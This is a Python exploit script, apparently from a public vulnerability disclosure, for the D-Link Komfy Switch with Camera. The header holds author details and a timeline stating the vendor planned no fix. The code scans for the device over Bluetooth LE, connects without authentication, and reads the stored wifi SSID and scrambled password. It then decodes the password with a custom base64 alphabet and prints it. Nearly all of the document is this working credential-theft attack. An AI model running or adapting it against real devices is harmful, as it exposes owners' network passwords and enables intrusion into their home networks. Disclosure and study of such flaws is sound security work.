#!/usr/bin/python
# Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE
# Date: Oct 13, 2016
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/
# HW Model: DKZ-201S/W
# SW Version: 1.0
# Tested on: Ubuntu 16.04 LTS / Python 2.7
# Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link
# 10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned.
# Vulnerability Summary
#It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE).
# Vulnerability Details
#https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure
# Author: Jason Doyle @_jasondoyle
# Komfy Switch with Camera wifi password disclosure exploit script
import re, base64
from bluepy.btle import Scanner
from gattlib import GATTRequester
#lookup table to unscramble
base64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # '=' used for padding
komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$" # '$' used for padding
scanner = Scanner()
devices = scanner.scan(5.0)
bAddr = ""
for dev in devices:
if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9):
bAddr = dev.addr
print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)
if not bAddr:
print "No Komfy switches found"
sys.exit(1)
req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0')
req.connect(True, 'public', 'none', 0, 78)
#request SSID
wifiSsid = req.read_by_uuid("0xb006")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiSsid)
wifiSsid = reg.groups()[1].replace("\\","")
#request komfy encoded wifi password
wifiPassKomfy64 = req.read_by_uuid("0xb007")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64)
wifiPassKomfy64 = reg.groups()[1].replace("\\","")
#convert password to real base64
wifiPassBase64 = ""
for char in wifiPassKomfy64:
i = komfy64Alphabet.index(char)
wifiPassBase64 += base64Alphabet[i]
wifiPass = base64.b64decode(wifiPassBase64)
print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)